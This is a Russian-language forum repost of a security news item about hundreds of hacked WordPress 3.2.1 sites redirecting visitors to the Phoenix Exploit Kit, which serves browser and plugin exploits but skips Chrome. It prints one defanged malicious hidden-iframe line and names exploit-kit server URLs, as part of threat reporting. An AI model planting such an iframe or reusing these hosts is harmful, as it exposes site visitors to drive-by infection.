Phoenix Exploit Kit распознаёт и не трогает браузеры Google Chrome

Hotab

Активный пользователь
Сообщения
1,163
Симпатии
300
Баллы
383
#1
пециалисты по безопасности из M86 Security Labs обнаружили массовое заражение сотен сайтов на движке WordPress 3.2.1. Используя известную уязвимость устаревшей версии WordPress и уже опубликованные эксплоиты для него (1, 2), злоумышленники внедряют жертве в папку Uploads файл HTML с редиректом на страницу с набором эксплоитов Phoenix Exploit Kit.

Уже обнаружено как минимум 400 заражённых сайтов: выборка 1, выборка 2. Самим этим сайтам беспокоиться не о чём, они могут даже не заметить заражения. Злоумышленники используют их просто в качестве красивых URL, чтобы ссылка вызывала доверие у жертв (и чтобы проще обойти спам-фильтры), и рассылают спам, содержащий ссылку на вышеупомянутую страницу.

proxy.php?image=http%3A%2F%2Fwww.xakep.ru%2Fpost%2F58210%2Femail001.png&hash=2ec8551bdf3a932d39ab18384269e137


Вот фрагмент обфусцированного этой страницы.
proxy.php?image=http%3A%2F%2Fwww.xakep.ru%2Fpost%2F58210%2Fhtml.png&hash=05e34bb6d97e9f2743fabdf6c47e5539


Этот обфусцированный код ведёт на серверы из инфраструктуры Phoenix Exploit Kit. Проведя расшифровку вышеуказанного кода, можно расшифровать конкретные URL, куда происходит редирект. Например, horoshovsebudet.ru.

Код:
IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0″
Другой URL из той же инфраструктуры — hxxxp://monikabestolucci.ru:8801/html/yveveqduclirb1.php.

При этом злоумышленники используют технику Fast Flux для динамического изменения соответствия между IP-адресом и доменным именем, так что данному домену соответствуют десятки IP-адресов.

proxy.php?image=http%3A%2F%2Fwww.xakep.ru%2Fpost%2F58210%2Fip.png&hash=e95788e39ca6ea4b571749cd3cadc7d5


На сайте Phoenix Exploit Kit происходит распознавание юзер-агента жертвы и на него сваливается ряд экслоитов, характерных для его версии ОС и браузера. Например, при распознавании IE6 пользователь получает эксплоиты для Internet Explorer, Adobe PDF, Flash и Oracle Java.

proxy.php?image=http%3A%2F%2Fwww.xakep.ru%2Fpost%2F58210%2Fphoenix1.png&hash=d1c92a0c474bfaf5987d4ef072f4021e


Судя по следующему скриншоту исходного кода Phoenix Exploit Kit по какой-то причине игнорирует пользователей браузера Google Chrome.
proxy.php?image=http%3A%2F%2Fwww.xakep.ru%2Fpost%2F58210%2Fsource_code.png&hash=552010106d180e44f876534999e1a399
 
Сверху Снизу